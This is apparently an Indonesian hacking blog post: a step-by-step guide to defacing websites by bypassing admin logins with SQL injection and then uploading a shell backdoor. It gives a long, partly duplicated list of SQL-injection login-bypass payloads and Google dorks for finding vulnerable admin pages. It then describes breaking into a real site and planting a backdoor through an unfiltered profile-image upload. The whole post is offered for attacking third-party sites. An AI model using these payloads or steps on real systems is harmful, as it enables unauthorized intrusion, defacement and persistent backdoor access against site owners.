website dan tools sedang dalam tahap pengembangan Hubungi admin untuk informasi lebih lanjut
Postingan

Deface POC Bypass Admin

 


Cara Melakukan Deface Menggunakan Metode Bypass Admin Panel


Teknik deface dengan metode bypass admin panel (juga dikenal sebagai teknik Deface POC Bypass Admin) adalah salah satu cara yang cukup sederhana. Inti dari metode ini adalah memanfaatkan celah pada halaman login yang tidak memiliki filterisasi karakter dengan benar. Dengan memanfaatkan kode injeksi SQL, seseorang dapat mengakses dashboard tanpa perlu mengetahui username atau password yang valid.h

Langkah Melakukan Bypass Admin Login Panel dan Upload Shell

Dalam praktiknya, seorang attacker atau hacker biasanya menggunakan teknik ini dengan memasukkan query SQL injeksi tertentu. Umumnya, kode injeksi yang digunakan mencakup simbol seperti '=''OR' atau ' OR 1=1 LIMIT 1 -- -+. Dengan menggunakan kode injeksi ini, sistem akan membaca username dan password sebagai valid, sehingga mengizinkan akses ke dalam panel admin.

Beberapa Kode SQL Injection untuk Bypass Admin:
  • ' or 1=1 limit 1 -- -+
  • '=''OR'
  • ' or '1'='1
  • ' or 'x'='x
  • ' or 0=0 --
  • " or 0=0 --
  • or 0=0 --
  • ' or 0=0 #
  • " or 0=0 #
  • or 0=0 #
  • ' or 'x'='x
  • " or "x"="x
  • ') or ('x'='x
  • ' or 1=1--
  • " or 1=1--
  • or 1=1--
  • ' or a=a--
  • " or "a"="a
  • ') or ('a'='a
  • ") or ("a"="a
  • hi" or "a"="a
  • hi" or 1=1 --
  • hi' or 1=1 --
  • 'or'1=1'
  • ==
  • and 1=1--
  • and 1=1
  • ' or 'one'='one--
  • ' or 'one'='one
  • ' and 'one'='one
  • ' and 'one'='one--
  • 1') and '1'='1--
  • admin' --
  • admin' #
  • admin'/*
  • or 1=1--
  • or 1=1#
  • or 1=1/*
  • ) or '1'='1--
  • ) or ('1'='1--
  • ' or '1'='1
  • ' or 'x'='x
  • ' or 0=0 --
  • " or 0=0 --
  • or 0=0 --
  • ' or 0=0 #
  • " or 0=0 #
  • or 0=0 #
  • ' or 'x'='x
  • " or "x"="x
  • ') or ('x'='x
  • ' or 1=1--
  • " or 1=1--
  • or 1=1--
  • ' or a=a--
  • " or "a"="a
  • ') or ('a'='a
  • ") or ("a"="a
  • hi" or "a"="a
  • hi" or 1=1 --
  • hi' or 1=1 --
  • 'or'1=1'

Dengan menggunakan kode SQL Injection tersebut, seorang penyerang dapat memanipulasi login admin dan membypass sistem keamanannya. Pada tutorial kali ini, kita akan membahas cara melakukan bypass admin login panel serta mengunggah shell. Mari simak panduannya di bawah ini!

Daftar Dork untuk Bypass Admin

Di bawah ini adalah beberapa dork yang bisa dikembangkan lebih lanjut untuk menemukan situs yang rentan terhadap bypass:

  • inurl:/admin/login.php?id=
  • inurl:/admin/login.php?site
  • inurl:login/administrator.php
  • inurl:admin/addblog.???
  • inurl:adminhome.php

Untuk belajar lebih lanjut tentang cara mengembangkan Google dork, kalian dapat mencari artikel terkait di blog ini. Panduan lengkapnya sudah ditulis secara terperinci.

Menentukan Halaman Login


Langkah pertama yang perlu dilakukan adalah mencari halaman login admin. Biasanya, halaman ini dapat diakses melalui URL seperti /admin/ atau /admin/login, di mana akan muncul formulir login. 

Sebagai contoh, saya menemukan sebuah situs yang rentan terhadap serangan Bypass Admin. Saya tinggal memasukkan kode SQL Injection yang sudah disiapkan, dan berhasil mendapatkan akses ke dashboard admin.

Menemukan Halaman untuk Mengunggah Shell Backdoor



Setiap situs memiliki tampilan dashboard yang berbeda-beda. Jika kalian sudah berhasil masuk ke halaman dashboard admin, langkah berikutnya adalah mencari halaman form unggahan. Form ini bisa berupa unggahan gambar, file, dokumen, atau jenis berkas lainnya.

Dalam kasus target kali ini, saya tidak menemukan halaman form tertentu, jadi saya mencoba mengganti gambar profil dengan shell backdoor. Kebetulan, saat mengunggah shell tersebut, tidak ada penyaringan ekstensi file, sehingga saya tidak perlu melakukan teknik bypass ekstensi.

Menemukan Lokasi Shell Backdoor


Langkah berikutnya adalah mengakses file yang sudah diunggah. Dalam kasus target kali ini, file tersebut terletak pada bagian gambar profil. Ketika file gambar diganti dengan ekstensi lain, biasanya tampilan gambar akan rusak atau tidak muncul dengan benar, seperti pada contoh yang terlihat.


Jika kalian menemukan target yang juga mengunggah shell melalui gambar, kalian cukup mengklik gambar tersebut dan membukanya di tab baru atau dengan mengklik kanan pada gambar.

Dengan cara ini, kalian akan secara otomatis mengakses file shell backdoor yang telah diunggah. Dan voilĂ ! Shell backdoor kalian berhasil diunggah. Sekarang kalian dapat melanjutkan dengan tujuan yang diinginkan. Ingatlah bahwa setiap tindakan memiliki konsekuensi. Semoga informasi ini bermanfaat.